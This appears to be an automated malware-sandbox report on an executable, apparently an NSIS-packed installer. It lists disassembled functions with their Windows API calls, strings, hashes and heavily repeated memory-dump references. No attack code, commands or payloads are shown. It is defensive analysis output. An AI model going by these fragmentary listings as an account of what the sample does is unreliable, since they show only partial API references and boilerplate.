Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69

Function 00402D9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
GetTickCount.KERNEL32 ref: 00402DD8
wsprintfW.USER32 ref: 00402E06

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
ShowWindow.USER32(00000000,00000005), ref: 00402E38

Part of subcall function 00402D83: MulDiv.KERNEL32(0049557D,00000064,004965C0), ref: 00402D98

Strings

... %d%%, xrefs: 00402E00

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
Opcode Fuzzy Hash: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE

Function 00404BAC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
GetMessagePos.USER32 ref: 00404BCF
ScreenToClient.USER32(?,?), ref: 00404BE9
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21

Strings

f, xrefs: 00404BFD

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4

Function 00402D04 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
wsprintfW.USER32 ref: 00402D56
SetWindowTextW.USER32(?,?), ref: 00402D66
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78

Strings

verifying installer: %d%%, xrefs: 00402D4B, 00402D54
unpacking data: %d%%, xrefs: 00402D44

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98

Function 00404A9E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
wsprintfW.USER32 ref: 00404B48
SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B

Strings

%u.%u%s%s, xrefs: 00404B29
H7B, xrefs: 00404B31

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll,?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll, xrefs: 00402552, 00402575, 00402589, 004025D5
artikulationer\Udsorteringerne, xrefs: 0040257C

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll$artikulationer\Udsorteringerne
API String ID: 3109718747-1380557968
Opcode ID: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
Opcode Fuzzy Hash: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
Opcode Fuzzy Hash: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769

Function 00405BE2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405BF0
CharNextW.USER32(00000000), ref: 00405BF5
CharNextW.USER32(00000000), ref: 00405C0D

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
